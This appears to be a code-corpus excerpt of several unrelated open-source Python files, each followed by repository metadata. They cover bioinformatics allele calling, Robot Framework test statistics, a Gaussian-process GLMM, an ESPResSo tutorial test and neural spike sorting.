                f.write(gAllele + ':' + lGenesFiles[genesI])
                f.close()
                i+=1
            genesI+=1
    else:
        try:
            # PhyloViz-style matrix: rows are genomes, columns are loci.
            phylovout=[]
            genesnames=[]
            statistics=[]
            for gene in lGenesFiles:
                genename=gene.split("/")
                #genename=genename[len(genename)-1].split(".")
                genename=genename[len(genename)-1]
                genesnames.append(genename)
            for geneOut in output:
                gene=0
                alleleschema=[]
                while gene<len(output[0][0]):
                    alleleschema.append(geneOut[1][gene])
                    """genename=(geneOut[1][gene]).split("_")
                    if(len(genename)!=1):
                        alleleschema.append(genename[1])
                    else:
                        alleleschema.append(genename[0])"""
                    gene+=1
                phylovout.append(alleleschema)
            genome=0
            finalphylovinput= "FILE"+ "\t"
            for geneid in genesnames:
                finalphylovinput+= str(geneid)+ "\t"
            # Per-genome tally of call categories while building the matrix.
            while genome<len(listOfGenomes):
                currentGenome = os.path.basename(listOfGenomes[genome])
                statsaux=[0]*6 # EXC INF LNF LOT incomplete SAC
                finalphylovinput+= "\n" + currentGenome + "\t"
                for gene in phylovout:
                    val= str(gene[genome])
                    finalphylovinput+= val + "\t"
                    if "INF" in val:
                        statsaux[1]+=1
                    elif "LNF" in val:
                        statsaux[2]+=1
                    elif "LOT" in val:
                        statsaux[3]+=1
                    elif "incomplete" in val:
                        statsaux[4]+=1
                    elif "small" in val:
                        statsaux[5]+=1
                    else:
                        statsaux[0]+=1
                genome+=1
                statistics.append(statsaux)
            gOutFile = os.path.dirname( "./")
            gOutFile += args.o
            statswrite='Stats:\tEXC\tINF\tLNF\tLOT\tincomplete\tsmall'
            i=0
            genome=0
            while genome<len(listOfGenomes):
                currentGenome = os.path.basename(listOfGenomes[genome])
                statsaux=[0]*6 # EXC NA INF LNF LOT incomplete SAC
                statswrite+= "\n" + currentGenome + "\t"
                for k in statistics[i]:
                    statswrite+= str(k) + "\t"
                i+=1
                genome+=1
            print statswrite
            with open(gOutFile, 'w') as f:
                f.write(finalphylovinput)
            statoutfile=os.path.dirname( "./")
            # NOTE(review): "stastics.txt" looks like a typo for "statistics.txt";
            # renaming would change the on-disk output, so it is kept as-is.
            with open("stastics.txt", 'w') as f:
                f.write(str(statswrite))
        except Exception as e:
            # Fall back to dumping the raw result structure if formatting fails.
            print e
            gOutFile = os.path.dirname( "./")
            gOutFile += args.o
            with open(gOutFile, 'w') as f:
                f.write(str(output))
    print ("Finished Script at : "+time.strftime("%H:%M:%S-%d/%m/%Y"))

if __name__ == "__main__":
    main()
|
mickaelsilva/pythonscripts
|
AlleleCalling/cluster_versions/alleleCalling_ORFbased_main.py
|
Python
|
gpl-2.0
| 9,262
|
[
"BLAST",
"HTSeq"
] |
87d1def22a13e2ea0de17a59c20b353b18d90a0cc6dec3eb70a5033a53cf63fc
|
# Copyright 2008-2014 Nokia Solutions and Networks
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from robot.utils import elapsed_time_to_string, html_escape, normalize
from .tags import TagPatterns
class Stat(object):
    """Generic statistic object used for storing all the statistic values."""

    def __init__(self, name):
        #: Human readable identifier of the object these statistics
        #: belong to. Either `All Tests` or `Critical Tests` for
        #: :class:`~robot.model.totalstatistics.TotalStatistics`,
        #: long name of the suite for
        #: :class:`~robot.model.suitestatistics.SuiteStatistics`
        #: or name of the tag for
        #: :class:`~robot.model.tagstatistics.TagStatistics`
        self.name = name
        #: Number of passed tests.
        self.passed = 0
        #: Number of failed tests.
        self.failed = 0
        #: Number of milliseconds it took to execute.
        self.elapsed = 0
        # Normalized name used only for sorting/comparison (underscores ignored).
        self._norm_name = normalize(name, ignore='_')

    def get_attributes(self, include_label=False, include_elapsed=False,
                       exclude_empty=False, values_as_strings=False,
                       html_escape=False):
        """Return the statistic values as a dict, shaped by the keyword flags.

        Note: the `html_escape` parameter deliberately shadows the imported
        `html_escape` function; escaping is done via `self._html_escape`.
        """
        attrs = {'pass': self.passed, 'fail': self.failed}
        attrs.update(self._get_custom_attrs())
        if include_label:
            attrs['label'] = self.name
        if include_elapsed:
            attrs['elapsed'] = elapsed_time_to_string(self.elapsed,
                                                      include_millis=False)
        if exclude_empty:
            attrs = dict((k, v) for k, v in attrs.items() if v != '')
        if values_as_strings:
            # Python 2 `unicode` builtin.
            attrs = dict((k, unicode(v)) for k, v in attrs.items())
        if html_escape:
            attrs = dict((k, self._html_escape(v)) for k, v in attrs.items())
        return attrs

    def _get_custom_attrs(self):
        # Hook for subclasses to add their own attributes (id, doc, links, ...).
        return {}

    def _html_escape(self, item):
        # Only strings are escaped (Python 2 `basestring`).
        return html_escape(item) if isinstance(item, basestring) else item

    @property
    def total(self):
        # Total number of tests counted by this statistic.
        return self.passed + self.failed

    def add_test(self, test):
        """Accumulate one test result into the counters and elapsed time."""
        self._update_stats(test)
        self._update_elapsed(test)

    def _update_stats(self, test):
        if test.passed:
            self.passed += 1
        else:
            self.failed += 1

    def _update_elapsed(self, test):
        self.elapsed += test.elapsedtime

    def __cmp__(self, other):
        # Python 2 ordering: alphabetical by normalized name.
        return cmp(self._norm_name, other._norm_name)

    def __nonzero__(self):
        # Python 2 truth value: a stat is truthy when nothing failed.
        return not self.failed

    def visit(self, visitor):
        # Visitor-pattern hook used by the result model.
        visitor.visit_stat(self)
class TotalStat(Stat):
    """Stores statistic values for a test run."""
    # Differs from the base Stat only by its `type` marker.
    #: Always string `total`
    type = 'total'
class SuiteStat(Stat):
    """Stores statistics values for a single suite."""
    #: Always string `suite`
    type = 'suite'

    def __init__(self, suite):
        Stat.__init__(self, suite.longname)
        #: Identifier of the suite, e.g. `s1-s2`.
        self.id = suite.id
        #: Number of milliseconds it took to execute this suite,
        #: including sub-suites.
        self.elapsed = suite.elapsedtime
        # Short suite name, exposed as 'name' via _get_custom_attrs().
        self._name = suite.name

    def _get_custom_attrs(self):
        return {'id': self.id, 'name': self._name}

    def _update_elapsed(self, test):
        # Elapsed time comes from the suite itself (set in __init__), so
        # per-test elapsed times must not be accumulated on top of it.
        pass

    def add_stat(self, other):
        """Merge pass/fail counts from another stat (e.g. a child suite)."""
        self.passed += other.passed
        self.failed += other.failed
class TagStat(Stat):
    """Stores statistic values for a single tag."""
    #: Always string `tag`.
    type = 'tag'

    def __init__(self, name, doc='', links=None, critical=False,
                 non_critical=False, combined=''):
        Stat.__init__(self, name)
        #: Documentation of tag as a string.
        self.doc = doc
        #: List of tuples in which the first value is the link URL and
        #: the second is the link title. An empty list by default.
        self.links = links or []
        #: ``True`` if tag is considered critical, ``False`` otherwise.
        self.critical = critical
        #: ``True`` if tag is considered non-critical, ``False`` otherwise.
        self.non_critical = non_critical
        #: Pattern as a string if the tag is combined,
        #: an empty string otherwise.
        self.combined = combined

    @property
    def info(self):
        """Returns additional information of the tag statistics
        are about. Either `critical`, `non-critical`, `combined` or an
        empty string.
        """
        if self.critical:
            return 'critical'
        if self.non_critical:
            return 'non-critical'
        if self.combined:
            return 'combined'
        return ''

    def _get_custom_attrs(self):
        return {'doc': self.doc, 'links': self._get_links_as_string(),
                'info': self.info, 'combined': self.combined}

    def _get_links_as_string(self):
        # Serialized as "title:url" pairs joined with ":::".
        return ':::'.join('%s:%s' % (title, url) for url, title in self.links)

    def __cmp__(self, other):
        # Sort order: critical tags first, then non-critical, then combined,
        # finally alphabetically by normalized name (Python 2 `cmp`).
        return cmp(other.critical, self.critical) \
            or cmp(other.non_critical, self.non_critical) \
            or cmp(bool(other.combined), bool(self.combined)) \
            or Stat.__cmp__(self, other)
class CombinedTagStat(TagStat):
    """Tag statistic for a combined tag pattern."""

    def __init__(self, pattern, name=None, doc='', links=None):
        # Fall back to the pattern itself when no explicit name is given.
        title = name or pattern
        TagStat.__init__(self, title, doc, links, combined=pattern)
        self._matcher = TagPatterns(pattern)

    def match(self, tags):
        """Return whether the given tags match the combined pattern."""
        return self._matcher.match(tags)
|
eric-stanley/robotframework
|
src/robot/model/stats.py
|
Python
|
apache-2.0
| 6,017
|
[
"VisIt"
] |
059f181f54a231a45174d2dd688b47e95801198e3a5f47ede044009b3a8994d8
|
from copy import copy
from numpy import asarray, diag, dot, exp
from numpy.linalg import pinv, solve
from glimix_core._ep import EPLinearKernel
from ._glmm import GLMM
class GLMMExpFam(GLMM):
    r"""Generalised Linear Gaussian Processes implementation.

    It implements inference over GLMMs via the Expectation Propagation [Min01]_
    algorithm.
    It currently supports the ``"Bernoulli"``, ``"Probit"``, ``"Binomial"``, and
    ``"Poisson"`` likelihoods. (For heterogeneous Normal likelihood, please refer to
    :class:`glimix_core.glmm.GLMMNormal` for a closed-form inference.)

    Parameters
    ----------
    y : array_like
        Outcome variable.
    lik : tuple
        Likelihood definition. The first item is one of the following likelihood names:
        ``"Bernoulli"``, ``"Binomial"``, ``"Normal"``, and ``"Poisson"``. For
        `Binomial`, the second item is an array of outcomes.
    X : array_like
        Covariates.
    QS : tuple
        Economic eigendecomposition.

    Example
    -------
    .. doctest::

        >>> from numpy import dot, sqrt, zeros
        >>> from numpy.random import RandomState
        >>>
        >>> from numpy_sugar.linalg import economic_qs
        >>>
        >>> from glimix_core.glmm import GLMMExpFam
        >>>
        >>> random = RandomState(0)
        >>> nsamples = 10
        >>>
        >>> X = random.randn(nsamples, 2)
        >>> G = random.randn(nsamples, 100)
        >>> K = dot(G, G.T)
        >>> ntrials = random.randint(1, 100, nsamples)
        >>> z = dot(G, random.randn(100)) / sqrt(100)
        >>>
        >>> successes = zeros(len(ntrials), int)
        >>> for i in range(len(ntrials)):
        ...     successes[i] = sum(z[i] + 0.2 * random.randn(ntrials[i]) > 0)
        >>>
        >>> QS = economic_qs(K)
        >>>
        >>> glmm = GLMMExpFam(successes, ('binomial', ntrials), X, QS)
        >>> print('Before: %.2f' % glmm.lml())
        Before: -16.40
        >>> glmm.fit(verbose=False)
        >>> print('After: %.2f' % glmm.lml())
        After: -13.43
    """

    def __init__(self, y, lik, X, QS=None, n_int=1000, rtol=1.49e-05, atol=1.49e-08):
        # liknorm is a compiled dependency; imported lazily so this module can
        # be imported without it.
        from liknorm import LikNormMachine

        GLMM.__init__(self, y, lik, X, QS)
        self._ep = EPLinearKernel(self._X.shape[0], rtol=rtol, atol=atol)
        self._ep.set_compute_moments(self.compute_moments)
        # n_int: number of integration points used by the moment machine.
        self._machine = LikNormMachine(self._lik[0], n_int)
        # When True, the EP approximation must be refreshed before use.
        self.update_approx = True
        # Any change to a hyperparameter invalidates the EP approximation.
        self._variables.get("beta").listen(self.set_update_approx)
        self._variables.get("logscale").listen(self.set_update_approx)
        self._variables.get("logitdelta").listen(self.set_update_approx)

    def __copy__(self):
        # The copy shares y/lik/X/QS but gets its own EP state.
        gef = GLMMExpFam(self._y, self._lik, self._X, self._QS)
        gef.__dict__["_ep"] = copy(self._ep)
        gef.__dict__["_ep"].set_compute_moments(gef.compute_moments)
        gef.update_approx = self.update_approx
        GLMM._copy_to(self, gef)
        return gef

    def __del__(self):
        # Release the native liknorm resources, if __init__ got that far.
        if hasattr(self, "_machine"):
            self._machine.finish()

    def _update_approx(self):
        """Refresh the EP prior if a hyperparameter changed since the last call."""
        if not self.update_approx:
            return
        self._ep.set_prior(self.mean(), self.covariance())
        self.update_approx = False

    @property
    def beta(self):
        return GLMM.beta.fget(self)

    @beta.setter
    def beta(self, v):
        GLMM.beta.fset(self, v)
        self.set_update_approx()

    def compute_moments(self, eta, tau, moments):
        # Delegated to liknorm: fills `moments` in place for the EP site updates.
        y = (self._y,) + self._lik[1:]
        self._machine.moments(y, eta, tau, moments)

    def covariance(self):
        """Covariance in the factorised (QS, scale, delta) form used by EP."""
        return dict(QS=self._QS, scale=self.scale, delta=self.delta)

    def fit(self, verbose=True, factr=1e5, pgtol=1e-7):
        # Mirror verbosity into the EP solver only for the duration of the fit.
        self._ep.verbose = verbose
        super(GLMMExpFam, self).fit(verbose=verbose, factr=factr, pgtol=pgtol)
        self._ep.verbose = False

    def fix(self, var_name):
        GLMM.fix(self, var_name)
        self.set_update_approx()

    def posteriori_mean(self):
        r"""Mean of the estimated posteriori.
        This is also the maximum a posteriori estimation of the latent variable.
        """
        from numpy_sugar.linalg import rsolve

        Sigma = self.posteriori_covariance()
        eta = self._ep._posterior.eta
        return dot(Sigma, eta + rsolve(GLMM.covariance(self), self.mean()))

    def posteriori_covariance(self):
        r"""Covariance of the estimated posteriori."""
        K = GLMM.covariance(self)
        tau = self._ep._posterior.tau
        return pinv(pinv(K) + diag(1 / tau))

    def gradient(self):
        r"""Gradient of the log of the marginal likelihood.

        Returns
        -------
        dict
            Map between variables to their gradient values.
        """
        self._update_approx()
        g = self._ep.lml_derivatives(self._X)
        # Chain rule: convert d/d(delta) and d/d(scale) into the unconstrained
        # logit/log parametrisations actually optimised.
        ed = exp(-self.logitdelta)
        es = exp(self.logscale)
        grad = dict()
        grad["logitdelta"] = g["delta"] * (ed / (1 + ed)) / (1 + ed)
        grad["logscale"] = g["scale"] * es
        grad["beta"] = g["mean"]
        return grad

    @property
    def logitdelta(_):
        # `_` is used instead of `self`; zero-argument super() works regardless
        # of the first parameter's name.
        return super().logitdelta

    @logitdelta.setter
    def logitdelta(self, v):
        GLMM.logitdelta.fset(self, v)
        self.set_update_approx()

    @property
    def logscale(_):
        return super().logscale

    @logscale.setter
    def logscale(self, v):
        GLMM.logscale.fset(self, v)
        self.set_update_approx()

    def set_update_approx(self, _=None):
        # Listener callback: mark the EP approximation as stale.
        self.update_approx = True

    def set_variable_bounds(self, var_name, bounds):
        GLMM.set_variable_bounds(self, var_name, bounds)
        self.set_update_approx()

    @property
    def site(self):
        return self._ep.site

    def unfix(self, var_name):
        GLMM.unfix(self, var_name)
        self.set_update_approx()

    def value(self):
        """Log of the marginal likelihood under the current EP approximation."""
        self._update_approx()
        return self._ep.lml()

    def predictive_mean(self, Xstar, ks, kss):
        # NOTE(review): accesses `self._ep.posterior` here while other methods
        # use `self._ep._posterior` — confirm both attributes exist on
        # EPLinearKernel.
        mstar = self.mean_star(Xstar)
        ks = self.covariance_star(ks)
        m = self.mean()
        eta = self._ep.posterior.eta
        tau = self._ep.posterior.tau
        mu = eta / tau
        K = GLMM.covariance(self)
        return mstar + dot(ks, solve(K, mu - m))

    def predictive_covariance(self, Xstar, ks, kss):
        from numpy_sugar.linalg import sum2diag

        kss = self.variance_star(kss)
        ks = self.covariance_star(ks)
        tau = self._ep.posterior.tau
        K = GLMM.covariance(self)
        KT = sum2diag(K, 1 / tau)
        ktk = solve(KT, ks.T)
        # Per-point variance reduction: kss_i - ks_i . KT^{-1} ks_i.
        b = []
        for i in range(len(kss)):
            b += [dot(ks[i, :], ktk[:, i])]
        b = asarray(b)
        return kss - b
|
limix/glimix-core
|
glimix_core/glmm/_expfam.py
|
Python
|
mit
| 6,734
|
[
"Gaussian"
] |
08dbc0e9336f63bf78f20dd7bee86eb55938a9396fe54ab4a3270b29946df6d7
|
# Copyright (C) 2019 The ESPResSo project
#
# This file is part of ESPResSo.
#
# ESPResSo is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# ESPResSo is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
import unittest as ut
import importlib_wrapper
import os
tutorial, skipIfMissingFeatures = importlib_wrapper.configure_and_import(
"@TUTORIALS_DIR@/active_matter/solutions/enhanced_diffusion.py",
cmd_arguments=[5.0], SAMP_STEPS=500, SAMP_LENGTH=100)
@skipIfMissingFeatures
class Tutorial(ut.TestCase):
    """Smoke test for the enhanced-diffusion tutorial: after the imported
    script has run, each observable must have produced its output file."""

    system = tutorial.system

    def test_file_generation(self):
        # One file per observable (MSD, VACF, angular VACF) for the chosen velocity.
        templates = ("msd_{}_0.dat", "vacf_{}_0.dat", "avacf_{}_0.dat")
        for template in templates:
            filepath = os.path.join(tutorial.outdir, template.format(tutorial.vel))
            self.assertTrue(
                os.path.isfile(filepath),
                filepath + " not created")
if __name__ == "__main__":
ut.main()
|
fweik/espresso
|
testsuite/scripts/tutorials/test_active_matter__enhanced_diffusion.py
|
Python
|
gpl-3.0
| 1,395
|
[
"ESPResSo"
] |
063affbb083310f4f0053911e99e8d4318db634701e75a6c53034f0073b03688
|
from numpy import *
import sortUtils as tech
import XKCD as XKCD
import matplotlib.pyplot as plt
import neuroTools as postdoc
from os import mkdir
from os.path import splitext, dirname,basename, isfile, isdir
from scipy.io import savemat,loadmat
from time import time
import cPickle
import json
from matplotlib import rcParams,mlab
rcParams['text.usetex']=True
rcParams['font.size']=16
from brian import *
from brian.library.electrophysiology import *
from brian.library.random_processes import *
from scipy.stats import scoreatpercentile, probplot, percentileofscore
from scipy.stats.mstats import zscore
""" This module takes a DDT file and analyzes the properties of its local field potentials and spike potentials. Each DDT file
contains the continuous voltage trace sampled at 20 kHz from one channel of a PLX recording. For further details on converting
PLX files to DDT or reading DDT files in Python, refer to the documentation in the function read_DDT
One initializes the Recording object by passing to it the filename of the DDT file.
Recording then searches to see if a MAT file with the calculated parameters already exists and so calculates only the
quantities it needs to.
If the DDT file is name abc.DDT then the MAT file is name abd.MAT
The parameters are stored in a dictionary called PARAMETERS and the data in a dictionary called DATA.
The filenames are stores in a dictionary called FILENAMES
Load unfiltered voltage trace
| First local maximum after the first 100 timepoints
|> Filter trace --> Detect spikes as First positive crossing of ---> Collect waveforms as the on either side of the
from energy of (16 * Median absolute deviations) spike time
voltage |
------------------------------------------------------------------------------------------------------------|
|
|> Form a matrix of those waveforms --> Extract the relevant features of that matrix ---> Identify neurons as clusters in the space
--------> Waveforms by discovering its eigenvectors -------------> PC 2
| ----------> Time |
| | |
| | (format to input to |
V V Pycluster) V
Time Waveforms PC1
|
------------------------------------------------------------------------------------------------------------|
|
| silhouettes Parameters and data
|> Verify clusters by ISI intervals ---> Save files in a directory to allow indexing with files from other recordings
"""
class Recording(object):
    """Analysis pipeline for one DDT continuous-voltage recording (Python 2).

    Loads (or restores from a cached MAT file) the raw trace, band-pass
    filters it, detects spikes from the signal energy, extracts waveforms,
    runs PCA + clustering, and saves derived files and figures under
    ``<path>/<name>/``.  See the module docstring for the full data flow.
    """
    def __init__(self, filename,verbose=False, test=True):
        # NOTE(review): the ``test`` parameter is accepted but never used.
        self.verbose = verbose
        self.IO = {}
        self.IO['input'] = filename
        self.IO['path'] = dirname(splitext(self.IO['input'])[0])
        self.IO['name'] = basename(splitext(self.IO['input'])[0])
        self.IO['matfile'] = self.IO['name']+'.mat'
        self.IO['pickle'] = self.IO['name']+'.pkl'
        self.IO['savepath'] = self.IO['path']+'/'+self.IO['name']
        # Downsampling stride applied to waveforms for plotting/PCA.
        self.skip = 1000
        '''Let the absolute path of the input file be ../abc.DDT
        self.IO['input'] is ../abc.DDT
        self.IO['path'] is ../
        self.IO['name'] is abc (note the lack of a file extension)
        '''
        #--------------------------File Handling----------------------------------------------------------------
        ''' The general approach is to create a directory and save two copies of every piece of analysis that
        an instantiation of recording does. This instantiation, once finished running, stores all analysis
        in a dictionary called DATA. That and the accompanying PARAMETERS dictionary are written to a MAT
        file. Both dictionaries are then written to JSON files.
        '''
        #-------------------------------------------------------------------------------------------------------
        self.parameters = {}
        # DSP settings: 20 kHz sampling, 300-7000 Hz band-pass for spikes.
        self.parameters['dsp'] = {'fs':20000,'lowcut':300,'highcut':7000}
        # Samples kept on either side of a detected spike when cutting waveforms.
        self.parameters['trace_analysis'] = {'lookahead':100,'lookback':100}
        self.parameters['clustering'] = {'N':1,'centroids': None}
        # Number of principal components retained for clustering.
        self.parameters['PCs'] = 3
        '''The following conditional makes sure that a voltage trace is in memory that has been bandpass filtered
        between 300 Hz and 7000 Hz using a 2nd order Butterworth forwards and backwards.
        '''
        if not isfile(self.IO['matfile']):
            print 'Loading %s -> ' % self.IO['name'],
            self.data = {}
            self.data['trace'] = self.load_voltage_trace()
            print 'Loaded'
            if self.verbose:
                print 'Filtering between {} and {} Hz'.format(self.parameters['dsp']['lowcut'],self.parameters['dsp']['highcut'])
                print 'Assuming a sampling rate of {} Hz'.format(self.parameters['dsp']['fs'])
            # Cache the filtered trace on disk so later runs skip the filter.
            if not isfile(self.IO['savepath']+'/'+self.IO['name']+'.filtered'):
                self.data['filtered_trace'] = tech.butter_bandpass_filter(self.data['trace'],**self.parameters['dsp'])
                with open(self.IO['savepath']+'/'+self.IO['name']+'.filtered','wb') as fid:
                    self.data['filtered_trace'].tofile(fid)
            else:
                self.data['filtered_trace'] = fromfile(self.IO['savepath']+'/'+self.IO['name']+'.filtered','float64')
            print 'Filtered'
            # Instantaneous energy (squared amplitude) drives spike detection.
            self.data['energy'] = self.data['filtered_trace']*self.data['filtered_trace']
            print 'Energy Calculated'
            self.populate_fields()
        else:
            print 'Loading %s from MAT file-> ' % self.IO['name'],
            self.data = loadmat(self.IO['matfile'])
            print 'Loaded '
        self.run()
    def run(self):
        """Persist all computed analysis products and figures."""
        print 'Saving'
        self.save()
        print 'Saved'
    def populate_fields(self):
        """Compute (or restore from cache files) the derived quantities:
        threshold constants, spike times, ISI, waveforms, PCA, clusters."""
        print 'Getting constants'
        self.data['constants']={}
        print 'Getting threshold'
        if not isfile(self.IO['savepath']+'/constants.json'):
            self.data['constants']['median'] = squeeze(median(self.data['filtered_trace']))
            self.data['constants']['mad'] = squeeze(median(absolute(self.data['energy']-median(self.data['energy']))))
            self.data['constants']['threshold']= squeeze(16*self.data['constants']['mad']) #Artifacts will be their own cluster
            with open(self.IO['savepath']+'/constants.json','wb') as f:
                json.dump(self.data['constants'],f)
                print 'Saved parameters to its JSON file'
        else:
            print 'Loading constants from file'
            self.data['constants'] = json.load(open(self.IO['savepath']+'/constants.json','rb'))
        print 'Got threshold'
        print 'Getting spiketimes'
        if not isfile(self.IO['savepath']+'/'+self.IO['name']+'.spiketimes'):
            self.data['spiketimes'] = tech.detect_spikes(self.data['energy'],self.data['constants']['threshold'])
            with open(self.IO['savepath']+'/'+self.IO['name']+'.spiketimes','wb') as fid:
                self.data['spiketimes'].tofile(fid)
        else:
            print 'Loading spiketimes from file'
            self.data['spiketimes'] = fromfile(self.IO['savepath']+'/'+self.IO['name']+'.spiketimes','float64')
        print 'Got and saved spiketimes'
        print 'Getting ISI and waveforms'
        self.data['ISI'] = diff(self.data['spiketimes'])
        self.data['wfs'] = tech.get_waveforms(self.data['filtered_trace'],self.data['spiketimes'],**self.parameters['trace_analysis'])
        with open(self.IO['savepath']+'/'+self.IO['name']+'.waveforms','wb') as fid:
            self.data['wfs'].tofile(fid)
        print 'Got and saved waveforms'
        # PCA is run on waveforms downsampled by self.skip to limit memory.
        self.data['PCA'] = dict(zip(['eigvals','projections','eigvecs'],tech.princomp(self.data['wfs'][::self.skip],numpc=self.parameters['PCs'])))
        print 'Got PCs'
        self.data['clustering'] = tech.cluster(transpose(self.data['PCA']['projections']))
        print 'Got Clusters'
    def save(self): # NOTE(review): I/O here is ad hoc; candidate for consolidation
        """Write PCA and clustering products to text files, then render and
        save the summary figures."""
        # First, save data
        fmt = '%.4f'
        if not isdir(self.IO['savepath']):
            mkdir(self.IO['savepath'])
        '''
        #For each, save spiketimes and PCs to their own files
        savetxt(self.IO['savepath']+'/'+self.IO['name']+'.txt.spiketimes',self.data['spiketimes'],delimiter='\t')
        print 'Saved spiketimes to text file'
        '''
        for key,value in self.data['PCA'].iteritems():
            savetxt(self.IO['savepath']+'/'+self.IO['name']+'.'+key,value,fmt=fmt,delimiter='\t')
            print 'Saved principal components %s to text file' % key
        # NOTE(review): ``fmt`` switches to '%u' permanently once a
        # 'clustermap' key is seen — confirm later keys should also use it.
        for cluster in self.data['clustering']:
            for key,value in cluster.iteritems():
                if key == 'clustermap':
                    fmt = '%u'
                savetxt(self.IO['savepath']+'/'+self.IO['name']+'.'+key,squeeze(value),fmt=fmt,delimiter='\t')
                print 'Saved clustering components %s to text file' % key
        '''
        with open(self.IO['savepath']+'/constants.json','wb') as f:
            json.dump(self.data['constants'],f)
        for key,value in self.data.iteritems():
            if key not in ['PCA','clustering','trace','filtered_trace','energy','ISI' ]:
                #It's better not to save the waveforms, it takes up so much memory,
                #easier to dynamically generate them
                savetxt(self.IO['savepath']+'/'+self.IO['name']+'.'+key,value,delimiter='\t')
                print 'Saved %s to text file' % key
        with open(self.IO['savepath']+'/parameters.json','wb') as f:
            json.dump(self.parameters,f)
        print 'Saved parameters to its JSON file'
        '''
        # Then, save figures
        print 'Saving Voltage Trace'
        self.save_voltage_trace()
        print 'Saving ISI and Cluster'
        self.save_spike_validation()
        print 'Saving Waveforms'
        self.save_waveforms()
    def __repr__(self):
        # NOTE(review): self.filename is never assigned (__init__ stores the
        # path in self.IO['input']), so this raises AttributeError — fix.
        return 'Recording of %s' % self.filename
    def load_voltage_trace(self): #later expand to read PLX files
        """Read the raw 20 kHz voltage trace from the DDT input file."""
        return tech.read_DDT(self.IO['input'])
    def visualize(self,kind='trace',xkcd=False):
        """Interactive display dispatcher; currently only 'trace' is supported."""
        if kind == 'trace':
            # NOTE(review): the caller's ``xkcd`` flag is ignored; a literal
            # False is passed instead — confirm intended.
            self.visualize_voltage_trace(xkcd=False)
    def save_voltage_trace(self, xkcd=False):
        """Plot raw and filtered traces (downsampled) with detection thresholds
        and save the figure as <name>_voltage.png."""
        fig = plt.figure()
        trace_panel = fig.add_subplot(211)
        start = 20000
        stop = 40000
        trace_panel.plot(self.data['trace'][(70*start):(80*start):10],'b') #Downsample just for display
        trace_panel.set_xlabel(r'Time $\left(ms\right)$')
        trace_panel.set_ylabel(r'Voltage $ \left(\mu V \right)$')
        spike_panel = fig.add_subplot(212)
        spike_panel.plot(self.data['filtered_trace'][(70*start):(80*start):10],'b')
        spike_panel.set_xlabel(r'time $\left(ms\right)$')
        spike_panel.set_ylabel(r'Voltage $\left(\mu V \right)$')
        #Draw threshold
        spike_panel.axhline(y=0.25*self.data['constants']['threshold'],linewidth=1,color='r',linestyle='--')
        spike_panel.axhline(y=-0.25*self.data['constants']['threshold'],linewidth=1,color='r',linestyle='--')
        if xkcd:
            # NOTE(review): loop variable ``panel`` is unused; XKCDify is
            # applied to ``trace_panel`` twice instead of to each panel — bug.
            for panel in [trace_panel,spike_panel]:
                XKCD.XKCDify(trace_panel, expand_axes=True)
        plt.savefig(self.IO['savepath']+'/'+self.IO['name']+'_voltage.png',dpi=300)
        plt.close()
    def save_waveforms(self):
        """Plot downsampled spike waveforms plus the energy trace with its
        detection threshold; save as <name>_waveforms.png."""
        fig = plt.figure()
        waveform_panel = fig.add_subplot(211)
        waveform_panel.plot(self.data['wfs'][::self.skip])
        start = 20000
        stop = 40000
        energy_panel = fig.add_subplot(212)
        energy_panel.plot(self.data['energy'][(70*start):(80*start):10],'b')
        energy_panel.set_xlabel(r'time $\left(ms\right)$')
        energy_panel.set_ylabel(r'Energy $\left(mV^{2}\right)$')
        #Draw threshold
        energy_panel.axhline(y=self.data['constants']['threshold'],linewidth=1,color='r',linestyle='--')
        plt.savefig(self.IO['savepath']+'/'+self.IO['name']+'_waveforms.png',dpi=300)
    def save_spike_validation(self):
        """Plot the best clustering attempt (by silhouette) in PC space and the
        per-cluster waveforms; save as <name>_sorting.png."""
        #find biggest cluster
        final_cluster = sorted(self.data['clustering'],key=lambda attempt: attempt['silhouettes'])[-1]
        color = ['r','k','g','b','m','DarkOrange','purple'] #Assume there won't be more than noise and two units
        fig = plt.figure()
        cluster_panel = fig.add_subplot(211)
        clusterx,clustery = tech.toxy(final_cluster['centroids'])
        cluster_panel.scatter(clusterx,clustery,c='r',s=40)
        hold(True)
        nclusters = max(final_cluster['clustermap'])
        # NOTE(review): duplicate hold(True) call; harmless but redundant.
        hold(True)
        for n in range(nclusters+1):
            x = self.data['PCA']['projections'][0,:][final_cluster['clustermap'] == n]
            y = self.data['PCA']['projections'][1,:][final_cluster['clustermap'] == n]
            cluster_panel.scatter(x,y,marker='+', c=color[n])
            del x
            del y
        cluster_panel.set_ylabel('PC2')
        cluster_panel.set_xlabel('PC1')
        postdoc.adjust_spines(cluster_panel,['bottom','left'])
        waveform_panel = fig.add_subplot(212)
        # NOTE(review): range(nclusters) skips the last cluster index that the
        # scatter loop above includes (range(nclusters+1)) — confirm intended.
        for n in range(nclusters):
            waveform_panel.plot(self.data['wfs'][::self.skip][final_cluster['clustermap']==n],color[n])
        waveform_panel.set_xlabel('Time (us)')
        waveform_panel.set_ylabel('Voltage (uV)')
        postdoc.adjust_spines(waveform_panel,['bottom','left'])
        '''
        isi_panel = fig.add_subplot(212)
        isi_panel.hist(self.data['ISI'],bins=200,range=[0,300], normed=True)
        zoomed_isi = fig.add_axes([.65,.25,.2,.2])
        zoomed_isi.hist(self.data['ISI'],range=[0,20], normed=True)
        isi_panel.set_xlabel('time (ms)')
        isi_panel.set_ylabel('density')
        postdoc.adjust_spines(isi_panel,['bottom','left'])
        '''
        plt.savefig(self.IO['savepath']+'/'+self.IO['name']+'_sorting.png',dpi=300)
        plt.close()
|
mac389/brainpy
|
lib/Recording.py
|
Python
|
gpl-3.0
| 13,114
|
[
"Brian"
] |
370795ed0b45320bfcc06227ca69796c18ba1b417e30dc2bb677c9a09c9dba77
|
#!/usr/bin/python
#
# @author: Gaurav Rastogi (grastogi@avinetworks.com)
# Eric Anderson (eanderson@avinetworks.com)
